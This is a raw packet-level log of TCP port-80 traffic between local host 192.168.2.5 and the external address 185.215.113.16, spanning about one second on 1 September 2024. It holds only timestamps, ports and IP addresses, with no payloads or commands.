Sep 1, 2024 06:28:11.067312956 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.067322969 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.067358017 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.067372084 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.067543983 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.067589045 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.067600012 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.067606926 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.067651033 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.067651033 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.068101883 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.068150997 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.068289995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.068386078 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208287001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208302975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208314896 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208322048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208331108 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208343029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208354950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208359003 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208380938 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208416939 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208539963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208551884 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208586931 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208595037 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208698988 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208715916 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208726883 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208735943 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208759069 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208759069 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208786964 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208846092 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208857059 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208865881 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.208920002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208920002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.208998919 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209009886 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209060907 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.209191084 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209208012 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209253073 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.209289074 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.209497929 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209511995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209522963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209532022 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209542990 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.209557056 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.209594011 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.210366964 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.210377932 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.210387945 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.210398912 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.210408926 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.210422039 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.210439920 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.211148977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.211215973 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.216039896 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216051102 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216067076 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216077089 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216087103 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216097116 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216103077 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.216104031 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.216108084 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.216155052 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.216155052 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217171907 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217186928 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217197895 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217206001 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217216015 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217216969 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217226982 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217247963 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217288017 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217313051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217324972 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217335939 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217360973 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217391968 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217483997 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217494965 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217504978 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217514992 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217524052 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217541933 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217546940 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217546940 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217555046 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217576981 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217622995 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217745066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217756033 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217766047 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217776060 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217803955 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217827082 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217900991 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217911005 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217921019 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217936039 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217947006 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217957020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217962980 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217968941 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217982054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.217982054 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.217999935 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218034983 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218038082 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218045950 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218074083 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218087912 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218225002 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218235016 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218245029 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218255997 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218272924 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218291998 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218377113 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218389988 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.218420982 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218436956 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.218990088 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219001055 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219011068 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219022036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219033003 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219033957 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219062090 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219079971 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219146013 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219163895 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219194889 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219233990 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219455004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219528913 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.219557047 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.219602108 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299051046 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299113035 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299463987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299474955 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299479961 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299489975 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299499989 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299511909 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299526930 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299551010 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299551010 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299599886 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299637079 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299779892 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299792051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299802065 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299813032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299824953 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299825907 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299825907 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299835920 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.299845934 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.299876928 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.300425053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.300435066 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.300443888 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.300457001 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.300496101 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.357364893 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.357446909 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.357491016 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.357502937 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.357547045 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.357584000 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.357953072 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.357963085 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.357973099 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358005047 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358016968 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358030081 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358064890 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358105898 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358114958 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358217955 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358252048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358268023 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358278036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358288050 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358293056 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358299017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358308077 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358309984 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358319998 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358333111 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358354092 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358354092 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358365059 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.358971119 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358982086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.358993053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359025002 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359050989 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359097004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359107018 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359117985 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359127998 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359138966 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359141111 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359175920 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359668970 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359680891 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359704018 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359716892 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359720945 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359730959 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359744072 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359765053 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359765053 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359782934 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359918118 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359929085 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359939098 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359949112 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359960079 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.359968901 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359968901 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.359970093 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360014915 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360014915 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360415936 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360433102 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360443115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360454082 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360455036 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360465050 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360479116 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360486984 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360496998 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360498905 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.360511065 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.360546112 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361155987 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361170053 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361180067 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361190081 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361201048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361211061 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361222982 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361222982 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361223936 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361265898 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361265898 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361629009 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361640930 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361650944 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361660004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361670017 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361680031 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361686945 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361690044 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361701012 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.361731052 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.361746073 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.365710020 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.365753889 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.365755081 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.365763903 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.365797997 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.365814924 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.365983963 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.365993977 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366018057 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366029024 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366034985 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366034985 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366050959 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366090059 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366110086 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366121054 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366131067 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366141081 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366152048 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366163969 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366187096 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366187096 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366364956 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366377115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366403103 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366449118 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366523981 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366533995 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366544962 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366576910 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366576910 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366620064 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366630077 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366640091 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366651058 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366661072 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366671085 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.366677046 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366677046 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.366707087 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367032051 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367043018 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367053032 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367096901 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367096901 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367208004 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367218971 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367305040 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367455006 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367470980 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367482901 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367496967 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367516041 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367516041 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367708921 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367719889 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367733955 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367746115 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.367769957 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367769957 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.367808104 CEST	49711	80	192.168.2.5	185.215.113.16
Sep 1, 2024 06:28:11.368058920 CEST	80	49711	185.215.113.16	192.168.2.5
Sep 1, 2024 06:28:11.368069887 CEST	80	49711	185.215.113.16	192.168.2.5
